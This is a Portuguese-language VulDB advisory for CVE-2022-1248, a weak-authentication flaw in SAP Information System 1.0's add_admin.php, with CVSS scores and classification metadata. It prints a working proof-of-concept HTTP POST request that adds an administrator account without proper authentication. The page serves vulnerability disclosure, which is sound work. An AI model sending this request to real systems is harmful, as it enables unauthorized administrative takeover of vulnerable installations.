VDB-196550 · Submeter #34203 · CVE-2022-1248

SAP Information System 1.0 POST Request add_admin.php Autenticação fraca

CVSS Meta Pontuação Temporária	Preço atual do exploit (≈)	Nota de Interesse CTI
6.9	$0-$5k	0.00

Sumárioinformação

Uma vulnerabilidade classificada como crítico foi encontrada em SAP Information System 1.0. Afetado é uma função desconhecida do arquivo /SAP_Information_System/controllers/add_admin.php do componente POST Request Handler. A utilização pode causar Autenticação fraca. Esta vulnerabilidade é conhecida como CVE-2022-1248. O ataque pode ser iniciado a partir da rede. Além disso, existe um exploit disponível.

Detalhesinformação

Uma vulnerabilidade classificada como crítico foi encontrada em SAP Information System 1.0. Afetado é uma função desconhecida do arquivo /SAP_Information_System/controllers/add_admin.php do componente POST Request Handler. A utilização pode causar Autenticação fraca. O uso do CWE para declarar o problema aponta para CWE-287. A falha foi publicada 06/04/2022.

Esta vulnerabilidade é conhecida como CVE-2022-1248. O ataque pode ser iniciado a partir da rede. Detalhes técnicos estão disponíveis. A popularidade desta vulnerabilidade está abaixo da média. Além disso, existe um exploit disponível. Atualmente, o preço atual de um exploit pode ser aproximadamente USD $0-$5k no momento.

Foi declarado como prova de conceito. O exploit foi compartilhado para download em vuldb.com. Como 0-day, o valor estimado no mercado ilegal era por volta de $0-$5k. O código usado pelo exploit é:

POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username"

hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password"

P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user"

admin ------WebKitFormBoundaryYELEK8fMdX63l0iI--

Produtoinformação

Nome

SAP Information System

Versão

Licença

comercial

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 7.3
VulDB Meta Pontuação Temporária: 6.9

VulDB Pontuação Base: 7.3
VulDB Pontuação Temporária: 6.6
VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CNA Pontuação Base: 7.3
CNA Vetor (VulDB): 🔍

CVSSv2informação

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

Vector	Complexidade	Autenticação	Confidencialidade	Integridade	Disponibilidade
Desbloquear	Desbloquear	Desbloquear	Desbloquear	Desbloquear	Desbloquear
Desbloquear	Desbloquear	Desbloquear	Desbloquear	Desbloquear	Desbloquear
Desbloquear	Desbloquear	Desbloquear	Desbloquear	Desbloquear	Desbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação Temporária: 🔍
VulDB Fiabilidade: 🔍

Exploraçãoinformação

Classe: Autenticação fraca
CWE: CWE-287
CAPEC: 🔍
ATT&CK: 🔍

Físico: Não
Local: Não
Remoto: Sim

Disponibilidade: 🔍
Estado: Prova de conceito
Descarregar: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Tendência de preços: 🔍
Estimativa de preço atual: 🔍